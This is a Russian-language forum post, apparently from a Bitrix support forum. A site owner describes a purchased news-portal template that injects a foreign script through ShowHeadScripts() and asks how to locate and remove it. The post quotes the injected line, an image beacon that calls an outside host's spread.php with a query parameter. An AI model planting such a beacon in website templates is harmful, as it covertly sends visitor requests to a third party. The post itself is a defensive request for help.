Доброго времени. на демо версии на домашнем пробую запустить сайт, заказал простую верстку для новостного портала, и вот получил ее установил.
После запуска сайта, обратил внимание что внизу браузера , в статусной строке он то сайт хочет открыть то еще куда то отправляет запрос и ждет ответа.
В общем открыл исходный код страницы и увидел следующий код
Я переименовал шаблон - соответственно сайт загрузился без шаблона, в исходном коде пропал данный скрипт.
Вернул название шаблона обратно, появился.
Убрал из шаблона $APPLICATION->ShowHead();
соответственно сайт полупустой и скрипта нет.
Затем пролистав темы похожие , выяснил что $APPLICATION->ShowHead(); подключает
методом тыка, дописывал строчки и смотрел.
в общем скрипт (чужой) появляется когда я дописываю $this->ShowHeadScripts();
Поиском пытался найти в каком файле имеется текст
но он видимо зашифрован.
Подскажите как посмотреть какие именно js подключает в данный момент ShowHeadScripts();, что бы я уже смотрел в определенном файле , и попробовал удалить, этот скорее всего вредоносный код
Спасибо
После запуска сайта, обратил внимание что внизу браузера , в статусной строке он то сайт хочет открыть то еще куда то отправляет запрос и ждет ответа.
В общем открыл исходный код страницы и увидел следующий код
Код |
---|
<sc ript>new Image().src='http://адрес сайта не моего/bitrix/spread.php?s=ДофигаБуков';</sc ript> |
Вернул название шаблона обратно, появился.
Убрал из шаблона $APPLICATION->ShowHead();
соответственно сайт полупустой и скрипта нет.
Затем пролистав темы похожие , выяснил что $APPLICATION->ShowHead(); подключает
Код |
---|
$this->ShowMeta("robots", false, $bXhtmlStyle); $this->ShowMeta("keywords", false, $bXhtmlStyle); $this->ShowMeta("description", false, $bXhtmlStyle); $this->ShowLink("canonical", null, $bXhtmlStyle); $this->ShowCSS(true, $bXhtmlStyle); $this->ShowHeadStrings(); $this->ShowHeadScripts(); |
в общем скрипт (чужой) появляется когда я дописываю $this->ShowHeadScripts();
Поиском пытался найти в каком файле имеется текст
Код |
---|
<sc ript>new Image().src='http://адрес сайта не моего |
Подскажите как посмотреть какие именно js подключает в данный момент ShowHeadScripts();, что бы я уже смотрел в определенном файле , и попробовал удалить, этот скорее всего вредоносный код
Спасибо